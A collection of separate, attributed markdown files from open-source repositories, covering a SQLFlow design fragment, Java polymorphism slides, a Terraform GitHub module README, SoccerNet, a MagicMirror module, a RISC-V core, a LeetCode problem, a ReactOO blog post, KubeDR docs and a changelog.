The SQL syntax must allow users to set Estimator attributes (parameters of the Python class' constructor, and those of `train`, `evaluate`, or `predict`). Users can choose to use default values. We have a plan to integrate our hyperparameter estimation research into the system to optimize the default values.
Though estimators derived from `tf.estimator.Estimator` run algorithms as TensorFlow graphs, SQLFlow doesn't require that the underlying machine learning toolkit be TensorFlow. Indeed, as long as an estimator provides the methods `train`, `evaluate`, and `predict`, SQLFlow doesn't care whether it calls TensorFlow or xgboost. Precisely, what SQLFlow expects is an interface like the following:
```python
class AnEstimatorClass:
    def __init__(self, **kwargs): ...
    def train(self, **kwargs): ...
    def evaluate(self, **kwargs): ...
    def predict(self, **kwargs): ...
```
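For illustration, here is a minimal estimator that satisfies this interface without any machine learning toolkit at all (the class name, parameter names, and logic are made up for this sketch, and are not part of SQLFlow):

```python
# Hypothetical estimator for illustration only: it provides the four
# methods SQLFlow expects, with no dependency on TensorFlow or xgboost.
class MeanRegressor:
    def __init__(self, **kwargs):
        self.mean_ = None  # learned during train()

    def train(self, **kwargs):
        labels = kwargs["labels"]
        self.mean_ = sum(labels) / len(labels)

    def evaluate(self, **kwargs):
        # Mean squared error of the stored mean against the given labels.
        labels = kwargs["labels"]
        return sum((y - self.mean_) ** 2 for y in labels) / len(labels)

    def predict(self, **kwargs):
        # Predict the stored mean for every input row.
        return [self.mean_ for _ in kwargs["rows"]]
```

Any class with this shape, whether it wraps TensorFlow, xgboost, or plain Python, can be driven by the same generated program.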
We also want to reuse the [feature columns API](https://www.tensorflow.org/guide/feature_columns) from Estimator, which allows users to map columns of tables in a SQL engine to features of the model.
## Extended SQL Syntax
Again, just as the beginning of the iteration, we propose the syntax for training as
```sql
SELECT * FROM kaggle_credit_fraud_training_data
LIMIT 1000
TRAIN DNNClassifier /* a pre-defined TensorFlow estimator, tf.estimator.DNNClassifier */
WITH layers=[100, 200], /* a parameter of the Estimator class constructor */
train.batch_size = 8 /* a parameter of the Estimator.train method */
COLUMN *, /* all columns as raw features */
cross(v1, v9, v28) /* plus a derived (crossed) column */
LABEL class
INTO sqlflow_models.my_model_table; /* saves trained model parameters and features into a table */
```
We see the redundancy of `*` in two clauses: `SELECT` and `COLUMN`. The following alternative can avoid the redundancy, but cannot specify the label.
```sql
SELECT * /* raw features or the label? */
       cross(v1, v9, v28)  /* derived features */
FROM kaggle_credit_fraud_training_data
```
Please be aware that we save the trained models into tables, instead of a variable maintained by the underlying SQL engine. Inventing a new variable type to hold trained models would tightly integrate our system with the SQL engine and harm its extensibility to other engines.
The result table should include the following information:
1. The estimator name, e.g., `DNNClassifier` in this case.
1. Estimator attributes, e.g., `layers` and `train.batch_size`.
1. The feature mapping, e.g., `*` and `cross(v1, v9, v28)`.
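As a sketch of what saving into such a table could look like (illustrative only; the prototype targets MySQL, and the table and column names here are assumptions), the three items above can be stored as a single row:

```python
import json
import sqlite3

# An in-memory SQLite database stands in for MySQL purely for illustration.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE my_model_table (estimator TEXT, attributes TEXT, features TEXT)"
)
conn.execute(
    "INSERT INTO my_model_table VALUES (?, ?, ?)",
    (
        "DNNClassifier",  # 1. the estimator name
        json.dumps({"layers": [100, 200], "train.batch_size": 8}),  # 2. attributes
        json.dumps(["*", "cross(v1, v9, v28)"]),  # 3. the feature mapping
    ),
)
estimator, attributes, features = conn.execute(
    "SELECT * FROM my_model_table"
).fetchone()
```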
Similarly, to infer the class (fraud or regular), we could
```sql
SELECT * FROM kaggle_credit_fraud_development_data
PREDICT kaggle_credit_fraud_development_data.class
USING sqlflow_models.my_model_table;
```
## System Architecture
### A Conceptual Overview
In the prototype, we use the following architecture:
```
SQL statement -> our SQL parser --standard SQL-> MySQL
\-extended SQL-> code generator -> execution engine
```
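A first approximation of the routing decision in this diagram is a keyword check (hypothetical code; the real parser is more than a regex):

```python
import re

# Statements containing our extended keywords go to the code generator;
# everything else is forwarded to MySQL untouched.
EXTENDED_KEYWORDS = re.compile(r"\b(TRAIN|PREDICT)\b", re.IGNORECASE)

def route(statement):
    """Return the component that should handle the statement."""
    if EXTENDED_KEYWORDS.search(statement):
        return "code_generator"
    return "mysql"
```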
In the prototype, the code generator generates a Python program that trains or predicts. In either case,
1. it retrieves the data from MySQL via [MySQL Connector Python API](https://dev.mysql.com/downloads/connector/python/),
1. optionally, retrieves the model from MySQL,
1. trains the model or predicts using the trained model by calling the user specified TensorFlow estimator,
1. and writes the trained model or prediction results into a table.
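A toy version of that code generator can fill a program template from the parsed clauses (hypothetical and heavily simplified; the connection parameters and the emitted program are illustrative, not SQLFlow's actual output):

```python
# Minimal code generator sketch: parsed clauses in, Python source out.
TEMPLATE = """\
import mysql.connector

conn = mysql.connector.connect(user="root", database="sqlflow")
rows = conn.cursor().execute("{select}")
estimator = {estimator}({attrs})
estimator.train(rows=rows, batch_size={batch_size})
"""

def generate_trainer(select, estimator, attrs, batch_size):
    rendered_attrs = ", ".join(f"{k}={v!r}" for k, v in attrs.items())
    return TEMPLATE.format(
        select=select,
        estimator=estimator,
        attrs=rendered_attrs,
        batch_size=batch_size,
    )

program = generate_trainer(
    select="SELECT * FROM kaggle_credit_fraud_training_data LIMIT 1000",
    estimator="DNNClassifier",
    attrs={"layers": [100, 200]},
    batch_size=8,
)
```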
### Working with Jupyter Notebook and Kubernetes
The following figure shows the system components and their runtime environment. The left part shows how to run the system on a PC/laptop, and the right part shows how to run it on a Kubernetes cluster.

| 52.708075 | 483 | 0.763846 | eng_Latn | 0.988037 |
---

*Source: `.vuepress/public/cours/sources/poo_redefinition_polymorphisme/slides.md` from the `MataReDev/bts-sio` repository (MIT).*

# Overriding & Polymorphism
By [Valentin Brosseau](https://github.com/c4software) / [@c4software](http://twitter.com/c4software)
---
## Overriding
---

- What do you observe?
---

- What is going to happen?
---
<iframe src="https://giphy.com/embed/f3GoWhH08FxtUeeu0B" width="480" height="273" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
---
```java
class Animal{
    public void move(){
        // Movement implementation
    }
}

class Dog extends Animal {
    @Override
    public void move(){
        // A movement implementation that differs from the parent's
    }
    public void bark(){
        // The dog goes "woof".
    }
}
```
- What do you notice?
---
## Handy! But…
### What if we want to specialize rather than replace?
---
```java
class Animal{
public void bruit(){
System.out.print("BRUUUUIIIITTTT");
}
}
class Humain extends Animal {
@Override
public void bruit(){
        super.bruit();
System.out.print(" (Oui mais compréhensible)");
}
}
```
- Which element is important?
---
What will the following program print?
```java
Humain humain = new Humain();
humain.bruit();
```
---
```java
abstract class Animal{
abstract void bruit();
}
class Humain extends Animal {
@Override
public void bruit(){
        super.bruit();
System.out.print(" (Oui mais compréhensible)");
}
}
```
- Is this possible? Why?
---
## Wait a minute… Isn't this overloading?
<iframe src="https://giphy.com/embed/Y8hzdgPnZ6Hwk" width="480" height="379" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
---
No!
Overloading **≠** Overriding
<iframe src="https://giphy.com/embed/WrgAGkGrh0MD1Z2gkO" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
---
<fieldset>
<legend>To sum up, overriding…</legend>
<li>Only applies with inheritance.</li>
<li>The method signature <u>must be identical</u>.</li>
<li>Calling the parent implementation is possible.</li>
<li>Overloading ≠ Overriding</li>
</fieldset>
---
[Practice exercise](https://cours.brosseau.ovh/cours/exercices/poo/redefinition.html)
---
## Polymorphism
---
- Poly
- Morphism
---
- Poly = **Many**
- Morphism = **Form**
---
- Class B **"IS-A"** Class A.
- Every method of class A can therefore be called on class B.
---

- Give me an example of **IS-A**.
---
```java
Animal monLapin = new Lapin();
```
- Is this valid?
- What will our object be…
  - A rabbit?
  - An Animal?
---

- What do you notice?
---
<fieldset>
<legend>Polymorphism</legend>
<li>Is possible thanks to inheritance.</li>
<li>Lets you manipulate an object without knowing its exact type.</li>
<li>Lists of objects of different types.</li>
</fieldset>
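A possible extra illustration of that last point (hypothetical `Dog` and `Rabbit` classes, not from the course material):

```java
import java.util.List;

public class PolymorphismDemo {
    // Hypothetical classes, for illustration only.
    static abstract class Animal {
        abstract String sound();
    }

    static class Dog extends Animal {
        @Override
        String sound() { return "Woof"; }
    }

    static class Rabbit extends Animal {
        @Override
        String sound() { return "Squeak"; }
    }

    public static void main(String[] args) {
        // One list, two concrete types: each element answers with its own sound().
        List<Animal> animals = List.of(new Dog(), new Rabbit());
        for (Animal a : animals) {
            System.out.println(a.sound());
        }
    }
}
```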
---
[Practice exercise](https://cours.brosseau.ovh/cours/exercices/poo/polymorphisme.html)
---
## Any questions?
| 16.652406 | 143 | 0.657354 | fra_Latn | 0.673876 |
---

*Source: `README.md` from the `pitts-technologies/terraform-module-github-repo` repository (Apache-2.0).*

# Terraform Module - GitHub Repository
A terraform module for creating repositories in your GitHub Organization.
This module is a "quick-and-dirty" way of achieving reusable, automated github repo provisioning & configuration. I would like to make org & team input optional, but the limitations of terraform's HCL configuration language have made this a challenge. With that said, the recent syntax improvements introduced in Terraform 0.12 release may open up some possibilities of improvement, and higher flexibility for this module.
Created using Terraform v0.11.13
## Requirements:
Set the following environment variables before running:
```shell
export GITHUB_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
export GITHUB_ORGANIZATION=your-org-name
```
The account that is associated with the above token must have "owner" permissions on the organization that is referenced as an input variable.
This module requires the existence of a GitHub team to be given access to the repository.
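A minimal usage sketch (the module `source` reference and all values below are assumptions; see the Inputs table for the full parameter list):

```hcl
module "github_repo" {
  # Hypothetical source reference; point this at wherever the module lives.
  source = "git::https://github.com/pitts-technologies/terraform-module-github-repo.git"

  name        = "my-service"
  description = "Example repository managed by Terraform"
  private     = true
  team_slug   = "platform-team"
  topics      = ["terraform", "example"]
}
```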
## Branch Protection Inputs
The following input variables are intended to be written as a "list of maps". While this is more complex than granular parameters for each map, it allows the user to be more specific and flexible when setting detailed access policies.
### Required Status Checks
Example:
```hcl
required_status_checks = [
{
strict = false
contexts = ["ci/travis"]
}
]
```
### Required Pull Request Reviews
Example:
```hcl
required_pull_request_reviews = [
{
dismiss_stale_reviews = true
dismissal_users = ["foo-user"]
dismissal_teams = ["${var.github_team}", "${var.github_team_2}"]
}
]
```
### Restrictions
Example:
```hcl
restrictions = [
{
users = ["foo-user"]
teams = ["${var.github_team}"]
}
]
```
## Inputs
| Name | Description | Type | Default | Required |
|------|-------------|:----:|:-----:|:-----:|
| name | (Required) The name of the repository. | string | n/a | yes |
| allow\_merge\_commit | (Optional) Set to false to disable merge commits on the repository. | string | `"true"` | no |
| allow\_rebase\_merge | (Optional) Set to false to disable rebase merges on the repository. | string | `"true"` | no |
| allow\_squash\_merge | (Optional) Set to false to disable squash merges on the repository. | string | `"true"` | no |
| archived | (Optional) Specifies if the repository should be archived. Defaults to false. | string | `"false"` | no |
| auto\_init | (Optional) Set to true to produce an initial commit in the repository. | string | `"false"` | no |
| default\_branch | (Optional) The name of the default branch of the repository. NOTE: This can only be set after a repository has already been created, and after a correct reference has been created for the target branch inside the repository. This means a user will have to omit this parameter from the initial repository creation and create the target branch inside of the repository prior to setting this attribute. | string | `""` | no |
| description | (Optional) A description of the repository. | string | `""` | no |
| enforce\_admins | (Optional) Boolean, setting this to true enforces status checks for repository administrators. | string | `"false"` | no |
| gitignore\_template | (Optional) Use the name of the template without the extension. For example, \"Haskell\". | string | `""` | no |
| has\_downloads | (Optional) Set to true to enable the (deprecated) downloads features on the repository. | string | `"false"` | no |
| has\_issues | (Optional) Set to true to enable the GitHub Issues features on the repository. | string | `"false"` | no |
| has\_projects | (Optional) Set to true to enable the GitHub Projects features on the repository. Per the github documentation when in an organization that has disabled repository projects it will default to false and will otherwise default to true. If you specify true when it has been disabled it will return an error. | string | `"false"` | no |
| has\_wiki | (Optional) Set to true to enable the GitHub Wiki features on the repository. | string | `"false"` | no |
| homepage\_url | (Optional) URL of a page describing the project. | string | `""` | no |
| license\_template | (Optional) Use the name of the template without the extension. For example, \"mit\" or \"mpl-2.0\". | string | `""` | no |
| permission | (Optional) The permissions of team members regarding the repository. Must be one of pull, push, or admin. Defaults to pull. | string | `"pull"` | no |
| private | (Optional) Set to true to create a private repository. Repositories are created as public (e.g. open source) by default. | string | `"false"` | no |
| required\_pull\_request\_reviews | (Optional) Enforce restrictions for pull request reviews. | list | `<list>` | no |
| required\_status\_checks | (Optional) Enforce restrictions for required status checks. | list | `<list>` | no |
| restrictions | (Optional) Enforce restrictions for the users and teams that may push to the branch. | list | `<list>` | no |
| team\_slug | (Required) The GitHub team slug | string | `""` | yes |
| topics | (Optional) The list of topics of the repository. | list | `<list>` | no |
## Outputs
| Name | Description |
|------|-------------|
| full\_name | A string of the form \"orgname/reponame\". |
| git\_clone\_url | URL that can be provided to `git clone` to clone the repository anonymously via the git protocol. |
| html\_url | URL to the repository on the web. |
| http\_clone\_url | URL that can be provided to `git clone` to clone the repository via HTTPS. |
| ssh\_clone\_url | URL that can be provided to `git clone` to clone the repository via SSH. |
| svn\_url | URL that can be provided to svn checkout to check out the repository via GitHub's Subversion protocol emulation. |
| 61.670213 | 442 | 0.712265 | eng_Latn | 0.994418 |
---

*Source: `README.md` from the `SilvioGiancola/SoccerNetv2-DevK` repository (MIT).*

# SoccerNetv2-DevKit
Welcome to the SoccerNet-V2 Development Kit for the SoccerNet Benchmark and Challenge. This kit is meant as a help to get started working with the soccernet data and the proposed tasks. More information about the dataset can be found on our [official website](https://soccer-net.org/).
SoccerNet-v2 is an extension of SoccerNet-v1 with new and challenging tasks including
action spotting, camera shot segmentation with boundary detection, and a novel replay grounding task.
<p align="center"><img src="Images/GraphicalAbstract-SoccerNet-V2-1.png" width="640"></p>
The dataset consists of 500 complete soccer games including:
- Full untrimmed broadcast videos in both low and high resolution.
- Pre-computed features such as ResNet-152.
- Annotations of actions among 17 classes (Labels-v2.json).
- Annotations of camera replays linked to actions (Labels-cameras.json).
- Annotations of camera changes and camera types for 200 games (Labels-cameras.json).
Participate in our upcoming Challenge in the [CVPR 2021 International Challenge on Activity Recognition Workshop](http://activity-net.org/challenges/2021/index.html) and try to win up to 1000$ sponsored by [Second Spectrum](https://www.secondspectrum.com/index.html)! All details can be found on the [challenge website](https://eval.ai/web/challenges/challenge-page/761/overview), or on the [main page](https://soccer-net.org/).
The participation deadline is fixed at the 30th of May 2021.
The official rules and guidelines are available on [ChallengeRules.md](ChallengeRules.md).
<a href="https://youtu.be/T8Qc39FcQ7A">
<p align="center"><img src="Images/Miniature.png" width="720"></p>
</a>
## How to download SoccerNet-v2
A [SoccerNet pip package](https://pypi.org/project/SoccerNet/) to easily download the data and the annotations is available.
To install the pip package simply run:
<code>pip install SoccerNet</code>
Please follow the instructions provided in the [Download](Download) folder of this repository. Also note that signing a Non-Disclosure Agreement (NDA) is required to access the LQ and HQ videos: [NDA](https://docs.google.com/forms/d/e/1FAIpQLSfYFqjZNm4IgwGnyJXDPk2Ko_lZcbVtYX73w5lf6din5nxfmA/viewform).
## How to extract video features
As it was one of the most requested features on SoccerNet-V1, this repository provides functions to automatically extract the ResNet-152 features and compute the PCA on your own broadcast videos. These functions allow you to test pre-trained action spotting, camera segmentation or replay grounding models on your own games.
The functions to extract the video features can be found in the [Features](Features) folder.
<p align="center"><img src="Images/Videos_and_features.png" width="720"></p>
## Baseline Implementations
This repository contains several baselines for each task which are presented in the [SoccerNet-V2 paper](https://arxiv.org/pdf/2011.13367.pdf), or subsequent papers. You can use these codes to build upon our methods and improve the performances.
- Action Spotting [[Link]](Task1-ActionSpotting)
- Camera Shot Segmentation [[Link]](Task2-CameraShotSegmentation)
- Replay Grounding [[Link]](Task3-ReplayGrounding)
## Evaluation
This repository and the pip package provide evaluation functions for the three proposed tasks based on predictions saved in the JSON format. See the [Evaluation](Evaluation) folder of this repository for more details.
## Visualizations
Finally, this repository provides the [Annotation tool](Annotation) used to annotate the actions, the camera types and the replays. This tool can be used to visualize the information. Please follow the instruction in the dedicated folder for more details.
## Citation
For further information check out the paper and supplementary material:
https://arxiv.org/abs/2011.13367
Please cite our work if you use our dataset:
```bibtex
@InProceedings{Deliège2020SoccerNetv2,
title={SoccerNet-v2 : A Dataset and Benchmarks for Holistic Understanding of Broadcast Soccer Videos},
author={Adrien Deliège and Anthony Cioppa and Silvio Giancola and Meisam J. Seikavandi and Jacob V. Dueholm and Kamal Nasrollahi and Bernard Ghanem and Thomas B. Moeslund and Marc Van Droogenbroeck},
year={2021},
booktitle = {The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) Workshops},
month = {June},
}
```
| 57.038961 | 428 | 0.783925 | eng_Latn | 0.981006 |
---

*Source: `README.md` from the `MPPexcellent/MMM-CalendarExtTimeline` repository (MIT).*

# MMM-CalendarExtTimeline
Display current timeline schedules. This is a plugin module for `MMM-CalendarExt` and `MMM-CalendarExt2`.
## Screenshot ##

## Installation ##
**`MMM-CalendarExt` should be installed together for using this module.**
**You should update your `MMM-CalendarExt` (to a version newer than November 4, 2017) before using this.**
```shell
cd <your MagicMirror Directory>/modules
git clone https://github.com/eouia/MMM-CalendarExtTimeline
```
## Update ##
**2018-12-19**
- `MMM-CalendarExt2` supported.
## Configuration ##
```javascript
{
module:"MMM-CalendarExtTimeline",
position:"bottom_bar",
config: {
type: "static", // "static", "dynamic"
refresh_interval_sec: 60, // minimum 60,
table_title_format: "ddd, MMM Do",
begin_hour: 0, //ignored when you set type to 'dynamic'
end_hour: 6, //how many hours to show.
fromNow: 0, // add this many days to today's current date, e.g., 1 is tomorrow, -1 is yesterday
time_display_section_count: 6,
time_display_section_format: "HH:mm",
    calendars: ["your calendar name", "another name"], // in your `MMM-CalendarExt` configuration
    source: "CALEXT2", // or "CALEXT"
}
}
```
### type:"static" or "dynamic"
#### type:"static"
This will show timeline from `begin_hour` to `end_hour` of today.
For example:
```javascript
type:"static",
begin_hour: 6,
end_hour: 18,
```
will show timeline of schedule which goes from 6:00 to 18:00 today.
#### type:"dynamic"
This will show the timeline starting from the current hour and spanning the next `end_hour` hours.
```javascript
type:"dynamic",
end_hour: 6,
```
If the current time is 13:45, this will show schedules from 13:00 to 19:00. The view updates automatically as time passes.
`begin_hour` will be ignored when type is set to `dynamic`.
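The dynamic window described above can be sketched like this (illustrative logic only, not the module's actual implementation):

```javascript
// Illustrative only: derive the window shown in "dynamic" mode.
function dynamicWindow(now, endHour) {
  const start = new Date(now);
  start.setMinutes(0, 0, 0); // snap to the top of the current hour
  const end = new Date(start);
  end.setHours(start.getHours() + endHour);
  return { start, end };
}

// At 13:45 with end_hour = 6, the window is 13:00 to 19:00.
const w = dynamicWindow(new Date(2018, 0, 1, 13, 45), 6);
```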
### transform
See [Transforming in MMM-CalendarExt2](https://github.com/MMM-CalendarExt2/MMM-CalendarExt2/blob/master/docs/Filtering-and-Sorting.md#transforming). A `transform` key can be added to the MMM-CalendarExtTimeline config in the same way, for example:
```javascript
transform: (event) => {
if (event.title.includes("Meeting")) {
event.styleName = "meeting-style" // Change the CSS class name to highlight meetings
}
return event
}
```
### I just want to display only this module, not `MMM-CalendarExt` ###
In your configuration of `MMM-CalendarExt`, modify this.
```javascript
config: {
  system: {
    show: [], // set this field to an empty list.
  },
},
```
| 31.407407 | 247 | 0.711478 | eng_Latn | 0.930298 |
---

*Source: `rtl/vendor/openhwgroup_cv32e40p/README.md` from the `veronia-iskandar/core-v-mcu` repository (Apache-2.0).*

[](https://travis-ci.com/pulp-platform/riscv)
# OpenHW Group CORE-V CV32E40P RISC-V IP
CV32E40P is a small and efficient, 32-bit, in-order RISC-V core with a 4-stage pipeline that implements
the RV32IM\[F\]C instruction set architecture, and the Xpulp custom extensions for achieving
higher code density, performance, and energy efficiency \[[1](https://doi.org/10.1109/TVLSI.2017.2654506)\], \[[2](https://doi.org/10.1109/PATMOS.2017.8106976)\].
It started its life as a fork of the OR10N CPU core, which is based on the OpenRISC ISA.
Then, under the name RI5CY, it became a RISC-V core (2016) and was maintained
by the [PULP platform](https://www.pulp-platform.org/) team until February 2020,
when it was contributed to the [OpenHW Group](https://www.openhwgroup.org/).
## Documentation
The CV32E40P user manual can be found in the _docs_ folder. It is
captured in reStructuredText and rendered to HTML using [Sphinx](https://docs.readthedocs.io/en/stable/intro/getting-started-with-sphinx.html).
The rendered documentation is hosted on readthedocs and can be viewed [here](https://cv32e40p.readthedocs.io/en/latest/).
## Verification
The verification environment for the CV32E40P is _not_ in this repository. There is a small, simple testbench here which is
useful for experimentation only and should not be used to validate any changes to the RTL prior to pushing to the master
branch of this repo.
The verification environment for this core as well as other cores in the OpenHW Group CORE-V family is at the
[core-v-verif](https://github.com/openhwgroup/core-v-verif) repository on GitHub.
The Makefiles supported in the **core-v-verif** project automatically clone the appropriate version of the **cv32e40p** RTL sources.
## Constraints
Example synthesis constraints for the CV32E40P are provided.
## Contributing
We highly appreciate community contributions. We are currently using the lowRISC contribution guide.
To ease our work of reviewing your contributions,
please:
* Create your own fork to commit your changes and then open a Pull Request.
* Split large contributions into smaller commits addressing individual changes or bug fixes. Do not
mix unrelated changes into the same commit!
* Write meaningful commit messages. For more information, please check out [the Ibex contribution
guide](https://github.com/lowrisc/ibex/blob/master/CONTRIBUTING.md).
* If asked to modify your changes, do fixup your commits and rebase your branch to maintain a
clean history.
When contributing SystemVerilog source code, please try to be consistent and adhere to [the lowRISC Verilog
coding style guide](https://github.com/lowRISC/style-guides/blob/master/VerilogCodingStyle.md).
To get started, please check out the ["Good First Issue"
list](https://github.com/openhwgroup/cv32e40p/issues?q=is%3Aissue+is%3Aopen+-label%3Astatus%3Aresolved+label%3A%22good+first+issue%22).
## Issues and Troubleshooting
If you find any problems or issues with CV32E40P or the documentation, please check out the [issue
tracker](https://github.com/openhwgroup/cv32e40p/issues) and create a new issue if your problem is
not yet tracked.
## References
1. [Gautschi, Michael, et al. "Near-Threshold RISC-V Core With DSP Extensions for Scalable IoT Endpoint Devices."
in IEEE Transactions on Very Large Scale Integration (VLSI) Systems, vol. 25, no. 10, pp. 2700-2713, Oct. 2017](https://doi.org/10.1109/TVLSI.2017.2654506)
2. [Schiavone, Pasquale Davide, et al. "Slow and steady wins the race? A comparison of
ultra-low-power RISC-V cores for Internet-of-Things applications."
_27th International Symposium on Power and Timing Modeling, Optimization and Simulation
(PATMOS 2017)_](https://doi.org/10.1109/PATMOS.2017.8106976)
# [414. Third Maximum Number](https://leetcode-cn.com/problems/third-maximum-number/)
<p>Given a non-empty array, return the <strong>third maximum number</strong> in this array. If it does not exist, return the maximum number in the array.</p>
<p> </p>
<p><strong>Example 1:</strong></p>
<pre>
<strong>Input:</strong> [3, 2, 1]
<strong>Output:</strong> 1
<strong>Explanation:</strong> The third maximum is 1.</pre>
<p><strong>Example 2:</strong></p>
<pre>
<strong>Input:</strong> [1, 2]
<strong>Output:</strong> 2
<strong>Explanation:</strong> The third maximum does not exist, so the maximum (2) is returned instead.
</pre>
<p><strong>Example 3:</strong></p>
<pre>
<strong>Input:</strong> [2, 2, 3, 1]
<strong>Output:</strong> 1
<strong>Explanation:</strong> Note that the third maximum here means the third maximum distinct number.
Both numbers with value 2 are counted together as the second maximum. The third maximum distinct number is 1.</pre>
<p> </p>
<p><strong>Constraints:</strong></p>
<ul>
<li><code>1 <= nums.length <= 10<sup>4</sup></code></li>
<li><code>-2<sup>31</sup> <= nums[i] <= 2<sup>31</sup> - 1</code></li>
</ul>
<p> </p>
<p><strong>Follow up:</strong> Can you design an <code>O(n)</code> solution?</p>
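One possible answer to the follow-up is a single pass that tracks the three largest distinct values, giving O(n) time and O(1) extra space. The sketch below is our own illustration; the function and variable names are not part of the problem statement:

```javascript
// One-pass sketch: keep the three largest distinct values seen so far.
function thirdMax(nums) {
  let first = -Infinity, second = -Infinity, third = -Infinity;
  for (const n of nums) {
    if (n === first || n === second || n === third) continue; // skip duplicates
    if (n > first) {
      [first, second, third] = [n, first, second];
    } else if (n > second) {
      [second, third] = [n, second];
    } else if (n > third) {
      third = n;
    }
  }
  // If no third distinct maximum exists, fall back to the maximum.
  return third === -Infinity ? first : third;
}
```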
---
layout: post
title: How to implement inheritance in react.js.
date: 2015-10-13 14:19
author: mazong1123
comments: true
categories: [Uncategorized]
published: true
---
[React.js](https://facebook.github.io/react/) is a great library for building views in a component-oriented way. However, one thing that frustrates me is
that there's no inheritance support when using React.createClass() to create a react component. A "Class" cannot be inherited! Facebook
now recommends using [higher-order components](https://medium.com/@dan_abramov/mixins-are-dead-long-live-higher-order-components-94a0d2f9e750) to
address code reuse, which frustrates me even more. OK, I'm an old school object oriented guy. I just want something classic: class inheritance and overriding.
That's why I developed [ReactOO](https://github.com/mazong1123/reactoo). By leveraging ReactOO, we can build react components in a classic
OO way. Following is an example that builds a simple Button component:
window.ButtonClass = window.ReactOO.ReactBase.extend({
getReactDisplayName: function () {
return 'Button';
},
onReactRender: function (reactInstance) {
var self = this;
var text = reactInstance.props.text;
return React.createElement('button', self.getButtonProperty(reactInstance), text);
},
getButtonProperty: function (reactInstance) {
return {};
}
});
var button = new window.ButtonClass();
button.render({ text: 'Button' }, '#normalButton');
Now everything looks more classic. First, we defined a ButtonClass, which inherits from the base window.ReactOO.ReactBase class. Then we created an instance of ButtonClass and called its render() method to render itself into the element with the 'normalButton' id.
You probably noticed the **getButtonProperty** method. It can be overridden in a subclass, and the Button's properties can be changed. Nothing new, just overriding in the OO way. Let's build a StyledButtonClass in this manner:
window.StyledButtonClass = window.ButtonClass.extend({
getReactDisplayName: function () {
return 'StyledButton';
},
getButtonProperty: function (reactInstance) {
var self = this;
var property = self._super();
property.className = 'nice-button';
return property;
}
});
var styledButton = new window.StyledButtonClass();
styledButton.render({ text: 'Styled Button' }, '#styledButton');
StyledButtonClass inherits from ButtonClass and overrides **getButtonProperty** to add a **className** property. Done. Pretty simple, huh?
How about adding some interaction? Let's build a styled button with a click handler:
window.StyledButtonWithClickHandlerClass = window.StyledButtonClass.extend({
getReactDisplayName: function () {
return 'StyledButtonWithClickHandler';
},
getButtonProperty: function (reactInstance) {
var self = this;
var property = self._super();
property.onClick = reactInstance.handleClick;
return property;
},
onReactHandleClick: function (reactInstance, e) {
e.preventDefault();
alert('Clicked!');
}
});
var styledButtonWithClickHandler = new window.StyledButtonWithClickHandlerClass();
styledButtonWithClickHandler.render({ text: 'Styled Button With Click Handler' }, '#styledButtonWithClickHandler');
This time, we defined a class StyledButtonWithClickHandlerClass which inherits from StyledButtonClass, overrode the **getButtonProperty** method to add an onClick property, and then overrode the **onReactHandleClick** method to provide the click handler code. That's it.
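For readers curious how an API like this works under the hood, here is a minimal sketch of an extend()/_super mechanism in the style of John Resig's "Simple JavaScript Inheritance". To be clear, this is our own simplification for illustration, not ReactOO's actual source:

```javascript
// Illustrative only: NOT ReactOO's real implementation.
function extend(props) {
  var Parent = this;
  function Child() {}
  Child.prototype = Object.create(Parent.prototype);
  Object.keys(props).forEach(function (name) {
    var parentFn = Parent.prototype[name];
    var childFn = props[name];
    if (typeof childFn === 'function' && typeof parentFn === 'function') {
      // Wrap the override so it can reach the parent version via this._super().
      Child.prototype[name] = function () {
        var saved = this._super;
        this._super = parentFn.bind(this);
        try {
          return childFn.apply(this, arguments);
        } finally {
          this._super = saved;
        }
      };
    } else {
      Child.prototype[name] = childFn;
    }
  });
  Child.extend = extend;
  return Child;
}

// Usage sketch, mirroring the ButtonClass/StyledButtonClass example:
var Base = extend.call(function () {}, {
  getButtonProperty: function () { return {}; }
});
var Styled = Base.extend({
  getButtonProperty: function () {
    var property = this._super();
    property.className = 'nice-button';
    return property;
  }
});
```

The wrapper temporarily swaps `this._super` in before calling the override, which is what lets a subclass method call its parent's version by the same name.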
Please note that for any [react life cycle methods](https://facebook.github.io/react/docs/component-specs.html) or JavaScript event handlers (e.g. onClick, onSubmit), ReactOO provides a built-in handler method in the onReactxxx manner. A reactInstance can be used as an input parameter when you override these methods. [Please read the code sample and documentation for more details](https://github.com/mazong1123/reactoo).
[Another example on StackOverflow](http://stackoverflow.com/a/33139559/2719128)
Any bug or thoughts, please create an issue on [github](https://github.com/mazong1123/reactoo). Thanks :)
# KubeDR Docs
The documentation for *KubeDR* is divided into two guides:
- [User Guide](https://catalogicsoftware.com/clab-docs/kubedr/userguide)
- [Developer Guide](https://catalogicsoftware.com/clab-docs/kubedr/devguide)
We use [Sphinx](http://www.sphinx-doc.org/en/master/) to format and
build the documentation. The guides use
[Read the Docs](https://github.com/readthedocs/sphinx_rtd_theme)
theme.
## Installation
Here is one way to install Sphinx.
```bash
$ python3 -m venv ~/venv/sphinx
$ export PATH=~/venv/sphinx/bin:$PATH
$ pip install sphinx sphinx_rtd_theme
# For local builds, this helps in continuous build and refresh.
$ pip install sphinx-autobuild
```
## Build
```bash
$ cd docs/devguide
$ make html
```
This will generate HTML files in the directory ``html``. If you are
making changes locally and would like to automatically build and
refresh the generated files, use the following build command:
```bash
$ cd docs/devguide
$ sphinx-autobuild source build/html
```
## Guidelines
- The format for the documentation is
[reStructuredText](http://www.sphinx-doc.org/en/master/usage/restructuredtext/index.html).
- The source for docs should be readable in text form so please keep
lines short (80 chars). This will also help in checking diffs.
- Before checking in or submitting a PR, please build locally and
confirm that there are no errors or warnings from Sphinx.
# Change Log
All notable changes to this project will be documented in this file.
See [Conventional Commits](https://conventionalcommits.org) for commit guidelines.
# [0.2.0](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected]...@thi.ng/[email protected]) (2019-02-15)
### Bug Fixes
* **transducers-binary:** update juxt import ([77ed4c5](https://github.com/thi-ng/umbrella/commit/77ed4c5))
### Features
* **transducers-binary:** add utf8Length() ([7cf98ef](https://github.com/thi-ng/umbrella/commit/7cf98ef))
## [0.1.1](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected]...@thi.ng/[email protected]) (2019-02-10)
**Note:** Version bump only for package @thi.ng/transducers-binary
